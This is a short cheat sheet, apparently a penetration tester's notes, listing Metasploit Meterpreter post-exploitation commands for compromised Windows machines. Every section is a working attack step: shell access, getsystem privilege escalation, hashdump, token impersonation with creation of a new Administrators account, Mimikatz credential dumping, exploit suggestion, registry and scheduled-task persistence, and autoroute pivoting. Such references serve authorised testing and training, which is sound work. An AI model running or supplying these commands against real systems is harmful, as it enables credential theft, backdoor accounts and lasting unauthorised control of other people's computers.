windows meterpreter

shell access (cmd & powershell)
    # for cmd.exe
    shell
    # for powershell
    load powershell
    powershell_shell

windows specific commands
    getuid
    sysinfo
    ipconfig
    arp
    route
    getsystem
    getprivs
    migrate <system-process>
    hashdump

post enumeration
    run post/windows/gather/*

incognito (milkdevil/incognito2)
    load incognito
    list_tokens [-u | -g]
    impersonate_token "<token>"
    # for better results
    migrate <pid>
    add_user <user> <pass>
    add_localgroup Administrators <user>

mimikatz
    load kiwi
    creds_all

local exploit suggester
    run post/multi/recon/local_exploit_suggester

persistence
    persistence -h
    use exploit/windows/local/persistence
    use exploit/windows/local/registry_persistence
    run scheduleme
    run schtaskabuse

autoroute
    run autoroute -s IP/CIDR
    run autoroute -p
    [OR]
    use post/multi/manage/autoroute